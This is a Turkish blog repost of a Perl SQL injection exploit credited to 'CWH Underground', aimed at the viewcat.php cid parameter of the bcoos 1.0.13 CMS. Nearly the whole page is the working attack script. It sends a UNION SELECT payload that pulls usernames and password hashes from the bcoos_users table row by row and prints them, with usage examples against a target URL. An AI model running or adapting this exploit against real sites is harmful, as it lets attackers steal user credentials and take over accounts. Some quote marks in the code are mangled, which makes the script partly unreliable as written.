bcoos 1.0.13 (viewcat.php Cid) SQL Injection Exploit



UYGULAMA: bcoos

Version: 1.0.13 (önce versiyonları da belki etkilenen)
http://www.bcoos.net
İndir: http://www.bcoos.net/modules/mydownloads/cache/files/bcoos1.0.13.zip
# Not: magic_quotes_gpc = kapalı
Modüller yüklü olmalıdır

use LWP::UserAgent;
use HTTP::Request;

if ($#ARGV+1 != 2)
{
print "\n==============================================\n";
print " Bcoos Remote SQL Injection Exploit \n";
print " \n";
print " Discovered By CWH Underground \n";
print "==============================================\n";
print " \n";
print " ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";
print " \n";
print "Usage : ./xpl.pl \n";
print "Example: ./xpl.pl http://www.target.com/bcoos 10\n";
exit();
}

$target = ($ARGV[0] =~ /^http:\/\//) $ARGV[0]: ‘http://’ . $ARGV[0];
$number = $ARGV[1];

print “\n++++++++++++++++++++++++++++++++++++++++++++++++++++++”;
print “\n ..:: SQL Injection Exploit By CWH Underground ::.. “;
print “\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n”;
print “\n[+]Dump Username and Password\n”;

for ($start=0;$start<$number;$start++) {

$xpl = LWP::UserAgent->new() or die “Could not initialize browser\n”;
$req = HTTP::Request->new(GET => $target.”/modules/adresses/viewcat.php?cid=1%27%20and%201=2%20union%20select%201,concat(0×3a3a3a,uname,0×3a3a,pass,0×3a3a3a)%20from%20bcoos_users%20limit%201%20offset%20″.$start.”–+and+1=1″)or die “Failed to Connect, Try again!\n”;
$res = $xpl->request($req);
$info = $res->content;
$count=$start+1;

if ($info =~ /:::(.+):::/)
{
$dump=$1;
($username,$password)= split('::',$dump);
printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n”;
}
else {
print “\n [*]Exploit Done !!” or die “\n [*]Exploit Failed !!\n”;
exit;
}
}

Etiketler:

Hiç yorum yok:

Yorum Gönder

Kaydol: Kayıt Yorumları (Atom)